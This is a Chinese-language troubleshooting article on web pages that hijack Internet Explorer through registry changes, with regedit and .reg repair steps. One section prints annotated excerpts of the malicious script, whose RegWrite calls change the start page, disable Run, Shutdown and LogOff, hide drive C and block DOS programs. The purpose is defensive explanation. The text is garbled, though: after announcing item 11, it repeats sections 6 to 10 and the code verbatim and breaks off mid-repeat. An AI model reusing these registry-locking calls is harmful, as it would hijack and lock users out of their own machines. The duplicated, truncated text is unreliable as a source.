| <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> |
最近,屢屢發生網友在瀏覽網頁時,造成註冊表被修改,使得IE默認連接首頁、標題欄及IE右鍵菜單被改爲瀏覽網頁時的地址(多爲廣告信息及其它的討厭信息),更有甚者使瀏覽者的電腦在啓動時出現一個提示窗口顯示自己的廣告,並會自動打開很多的網頁,而且有愈演愈烈之勢,尤其在辦公室中,一不小心便中招,讓你措手不及,遇到這種情況我們該怎樣辦呢?
一、註冊表被修改的原因及解決辦法
其實,該惡意網頁是含有有害代碼的ActiveX網頁文件,這些廣告信息的出現是因爲瀏覽者的註冊表被惡意更改的結果。
1、IE默認連接首頁被修改
IE瀏覽器上方的標題欄被改成“歡迎訪問******網站”的樣式,這是最常見的篡改手段,受害者衆多。
受到更改的註冊表項目爲:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Start Page HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Start Page
通過修改“Start Page”的鍵值,來達到修改瀏覽者IE默認連接首頁的目的,如瀏覽“*****”就會將你的IE默認連接首頁修改爲http://ppw.****.com ”,即便是出於給自己的主頁做廣告的目的,也顯得太霸道了一些,這也是這類網頁惹人厭惡的原因。
解決辦法:
A.註冊表法:
①在Windows啓動後,點擊“開始”→“運行”菜單項,在“打開”欄中鍵入regedit,然後按“確定”鍵;
②展開註冊表到HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main下,在右半部分窗口中找到串值“Start Page”雙擊 ,將Start Page的鍵值改爲“about :blank”即可;
③同理,展開註冊表到HKEY_CURRENT_USER/Software/MicrosoftInternet Explorer/Main
在右半部分窗口中找到串值“Start Page”,然後按②中所述方法處理。
④退出註冊表編輯器,重新啓動計算機,一切OK了!
B.特殊例子:當IE的起始頁變成了某些網址後,就算你通過選項設置修改好了,重啓以後又會變成他們的網址啦,十分的難纏。其實他們是在你機器里加了一個自運行程序,它會在系統啓動時將你的IE起始頁設成他們的網站。
解決辦法:
運行註冊表編輯器regedit.exe,然後依次展開HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Run主鍵,然後將其下的registry.exe子鍵刪除,然後刪除自運行程序c:/ProgramFiles/registry.exe,最後從IE選項中重新設置起始頁就好了。
2、篡改IE的默認頁
有些IE被改了起始頁後,即使設置了“使用默認頁”仍然無效,這是因爲IE起始頁的默認頁也被篡改啦。具體說來就是以下註冊表項被修改:HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Main/Default_Page_URL“Default_Page_URL”這個子鍵的鍵值即起始頁的默認頁。
解決辦法:
A.運行註冊表編輯器,然後展開上述子鍵,將“Default_Page_UR”子鍵的鍵值中的那些篡改網站的網址改掉就好了,或者設置爲IE的默認值。
B.msconfig 有的還是將程序寫入硬盤中,重啓計算機後 首頁設置又被改了回去,這時可使用“系統配置實用程序”來解決。開始-運行,鍵入msconfig點擊“確定”,在彈出的窗口中切換到“啓動”選項卡,禁用可疑程序啓動項。
3、修改IE瀏覽器缺省主頁,並且鎖定設置項,禁止用戶更改回來。主要是修改了註冊表中IE設置的下面這些鍵值(DWORD值爲1時爲不可選):
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel] "Settings"=dword:1 [HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel] "Links"=dword:1 [HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel]"SecAddSites"=dword:1
解決辦法:
將上面這些DWORD值改爲“0”即可恢復功能。
4、IE的默認首頁灰色按扭不可選
這是由於註冊表HKEY_USERS/DEFAULT/Software/Policies/Microsoft/Internet Explorer/Control Panel下的DWORD值“homepage”的鍵值被修改的緣故。原來的鍵值爲“0”,被修改爲“1”(即爲灰色不可選狀態)。
解決辦法:
將“homepage”的鍵值改爲“0”即可。
5、IE標題欄被修改
在系統默認狀態下,是由應用程序本身來提供標題欄的信息,但也允許用戶自行在上述註冊表項目中填加信息,而一些惡意的網站正是利用了這一點來得逞的:它們將串值Window Title下的鍵值改爲其網站名或更多的廣告信息,從而達到改變瀏覽者IE標題欄的目的。
具體說來受到更改的註冊表項目爲:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Window Title HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Window Title
解決辦法:
①在Windows啓動後,點擊“開始”→“運行”菜單項,在“打開”欄中鍵入regedit,然後按“確定”鍵;
②展開註冊表HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main下,在右半部分窗口中找到串值“Window Title”,將該串值刪除即可,或將Window Title的鍵值改爲“IE瀏覽器”等你喜歡的名字;
③同理,展開註冊表到HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main然後按②中所述方法處理。
④退出註冊表編輯器,重新啓動計算機,運行IE,你會發現困擾你的問題解決了!
6、IE右鍵菜單被修改
受到修改的註冊表項目爲:HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt下被新建了網頁的廣告信息,並由此在IE右鍵菜單中出現!
解決辦法:
打開註冊標編輯器,找到HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt刪除相關的廣告條文即可,注意不要把下載軟件FlashGet和Netants也刪除掉啊,這兩個可是“正常”的呀,除非你不想在IE的右鍵菜單中見到它們。
7、IE默認搜索引擎被修改
在IE瀏覽器的工具欄中有一個搜索引擎的工具按鈕,可以實現網絡搜索,被篡改後只要點擊那個搜索工具按鈕就會鏈接到那個篡改網站。
出現這種現象的原因是以下註冊表被修改:
HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/CustomizeSearch HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/SearchAssistant
解決辦法:
運行註冊表編輯器,依次展開上述子鍵,將“CustomizeSearch”和“SearchAssis tant”的鍵值改爲某個搜索引擎的網址即可。
8、系統啓動時彈出對話框
受到更改的註冊表項目爲: HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的標題,“LegalNoticeText”是提示框的文本內容。由於它們的存在,就使得我們每次登陸到Windwos桌面前都出現一個提示窗口,顯示那些網頁的廣告信息!你瞧,多討厭啊!
解決辦法:
打開註冊表編輯器,找到HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogo這一個主鍵,然後在右邊窗口中找到“LegalNoticeCaption”和“LegalNoticeText”這兩個字符串,刪除這兩個字符串就可以解決在登陸時出現提示框的現象了。
9、瀏覽網頁註冊表被禁用
這是由於註冊表HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System下的DWORD值“DisableRegistryTools”被修改爲“1”的緣故,將其鍵值恢復爲“0”即可恢復註冊表的使用。
解決辦法
用記事本程序建立以REG爲後綴名的文件,將下面這些內容複製在其中就可以了:
REGEDIT4[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]“DisableRegistryTools”=dword:00000000。
10、瀏覽網頁開始菜單被修改
這是最“狠”的一種,讓瀏覽者有生不如死的感覺。瀏覽後不僅有類似上面所說的那些症狀,還會有以下更悲慘的遭遇:
進入該網頁會被:
1.修改開始菜單
1)禁止“關閉系統”
2)禁止“運行”
3)禁止“註銷”
2.隱藏C盤——你的C盤找不到了
3.禁止使用註冊表編輯器regedit
4.禁止使用DOS程序
5.使系統無法進入“實模式”
6.禁止運行任何程序
7.將IE瀏覽器的首頁改爲http://www.findfeel.com/,收藏夾中也被加入該網址。
那麼這些功能恐怖的功能是如何實現的呢?原來,該網頁是有人利用Java技術製作的含有有害代碼的ActiveX網頁文件。爲讓更多的人瞭解其危害,我查看了其源代碼,將其主要部分列了出來,並加了詳細的註釋(文中有“注”字的部分是我加的註釋)。
注:下面代碼是將你的IE默認連接首頁改爲http://www.findfeel.com/
Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Start Page", "http://www.findfeel.com/");
注:以下是該網頁修改受害者的註冊表項所用的招數
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer//NoRun", 01, "REG_BINARY");
注:使受害者系統沒有“運行”項,這樣用戶就不能通過註冊表編輯器來修改該有害網頁對系統註冊表的修改。
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer//NoClose", 01, "REG_BINARY");
注:使受害者系統沒有“關閉系統”項
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer//NoLogOff", 01, "REG_BINARY");
注:使受害者系統沒有“註銷”項
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer//NoDrives", "00000004", "REG_DWORD");
注:使受害者系統沒有邏輯驅動器C
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//WinOldApp// Disabled","REG_BINARY");
注:禁止運行所有的DOS應用程序;
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies/ /WinOldApp//NoRealMode","REG_BINARY");
注:使系統不能啓動到“實模式”(傳統的DOS模式)下;
又注:進入該網頁,它還會修改以下的註冊表項,使WINDOWS系統登錄時顯示一個登錄窗口(在MicroSoft網絡用戶登錄之前)
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Winlogon//LegalNoticeCaption", "嗚啦啦...");
注:這些代碼會使窗口的標題是“嗚啦啦…”
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Winlogon//LegalNoticeText", "歡迎你!你這個超級無敵大白癡!《嗚啦啦...》故事開始了,按確定進入悲慘世界");
注:上面一行是會在窗口中顯示出來的文字
注:下面兩行代碼修改註冊表,使受害者所有的IE窗口都加上以下的標題:“嗚啦啦…”
Shl.RegWrite ("HKLM//Software//Microsoft//Internet Explorer//Main//Window Title", "嗚啦啦..."); Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Window Title", "嗚啦啦...");
注:到上面一行爲止,完成了對受害者的註冊表的所有修改!
注:下面代碼用來將其網頁增加到受害者的收藏夾中
var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF + "//Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) + "//Documents and Settings//" + Net.UserName + "//Favorites"; if(!FSO.FolderExists(loc)) { return; } }
注:下面就是使其網頁加入到你的收藏夾的具體代碼
AddFavLnk(loc, "找到感覺www.findfeel.com", "http://www.findfeel.com");
由於代碼很簡單,又加了註釋,相信你已經看明白是怎麼回事了。那麼如果不小心進入該網頁,並且已經中招了該怎麼辦呢?別急,下面給你列出瞭解決的辦法。
受害用戶的修復方法:
1:對於Win9x用戶,建議在電腦啓動時按F8鍵,選擇到MS-DOS方式下,使用Scanreg/restore命令來恢復以前備份的、正常的註冊表。
2:對於Win2000用戶,把以下內容copy下來,存爲unlock.reg文件,選帶命令行的安全模式,用命令regedit unlock.reg導入,如何,重啓機器就OK了。
unlock.reg文件內容如下:
Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer] "NoDriveTypeAutoRun"=dword:00000095 "NoRun"=hex: "NoLogOff"=hex: "NoDrives"=dword:00000000 "RestrictRun"=dword:00000000 [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System] "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System] "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/WinOldApp] "Disabled"=dword:00000000 [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/WinOldApp] "NoRealMode"=dword:00000000 [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Winlogon] "LegalNoticeCaption"="" "LegalNoticeText"="" [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main] "Window Title"="IE瀏覽器" [HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main] "Window Title"="IE瀏覽器"
以上是比較常見的修改瀏覽者註冊表的現象,今天在瀏覽網頁時,無意中來到某個個人網站,又遇到了以前沒有碰到過的問題:
11、IE中鼠標右鍵失效
瀏覽網頁後在IE中鼠標右鍵失效,點擊右鍵沒有任何反應!
6、IE右鍵菜單被修改
受到修改的註冊表項目爲:HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt下被新建了網頁的廣告信息,並由此在IE右鍵菜單中出現!
解決辦法:
打開註冊標編輯器,找到HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt刪除相關的廣告條文即可,注意不要把下載軟件FlashGet和Netants也刪除掉啊,這兩個可是“正常”的呀,除非你不想在IE的右鍵菜單中見到它們。
7、IE默認搜索引擎被修改
在IE瀏覽器的工具欄中有一個搜索引擎的工具按鈕,可以實現網絡搜索,被篡改後只要點擊那個搜索工具按鈕就會鏈接到那個篡改網站。
出現這種現象的原因是以下註冊表被修改:
HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/CustomizeSearch HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/SearchAssistant
解決辦法:
運行註冊表編輯器,依次展開上述子鍵,將“CustomizeSearch”和“SearchAssis tant”的鍵值改爲某個搜索引擎的網址即可。
8、系統啓動時彈出對話框
受到更改的註冊表項目爲: HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的標題,“LegalNoticeText”是提示框的文本內容。由於它們的存在,就使得我們每次登陸到Windwos桌面前都出現一個提示窗口,顯示那些網頁的廣告信息!你瞧,多討厭啊!
解決辦法:
打開註冊表編輯器,找到HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogo這一個主鍵,然後在右邊窗口中找到“LegalNoticeCaption”和“LegalNoticeText”這兩個字符串,刪除這兩個字符串就可以解決在登陸時出現提示框的現象了。
9、瀏覽網頁註冊表被禁用
這是由於註冊表HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System下的DWORD值“DisableRegistryTools”被修改爲“1”的緣故,將其鍵值恢復爲“0”即可恢復註冊表的使用。
解決辦法
用記事本程序建立以REG爲後綴名的文件,將下面這些內容複製在其中就可以了:
REGEDIT4[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]“DisableRegistryTools”=dword:00000000。
10、瀏覽網頁開始菜單被修改
這是最“狠”的一種,讓瀏覽者有生不如死的感覺。瀏覽後不僅有類似上面所說的那些症狀,還會有以下更悲慘的遭遇:
進入該網頁會被:
1.修改開始菜單
1)禁止“關閉系統”
2)禁止“運行”
3)禁止“註銷”
2.隱藏C盤——你的C盤找不到了
3.禁止使用註冊表編輯器regedit
4.禁止使用DOS程序
5.使系統無法進入“實模式”
6.禁止運行任何程序
7.將IE瀏覽器的首頁改爲http://www.findfeel.com/,收藏夾中也被加入該網址。
那麼這些功能恐怖的功能是如何實現的呢?原來,該網頁是有人利用Java技術製作的含有有害代碼的ActiveX網頁文件。爲讓更多的人瞭解其危害,我查看了其源代碼,將其主要部分列了出來,並加了詳細的註釋(文中有“注”字的部分是我加的註釋)。
注:下面代碼是將你的IE默認連接首頁改爲http://www.findfeel.com/
Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Start Page", "http://www.findfeel.com/");
注:以下是該網頁修改受害者的註冊表項所用的招數
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer//NoRun", 01, "REG_BINARY");
注:使受害者系統沒有“運行”項,這樣用戶就不能通過註冊表編輯器來修改該有害網頁對系統註冊表的修改。
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer//NoClose", 01, "REG_BINARY");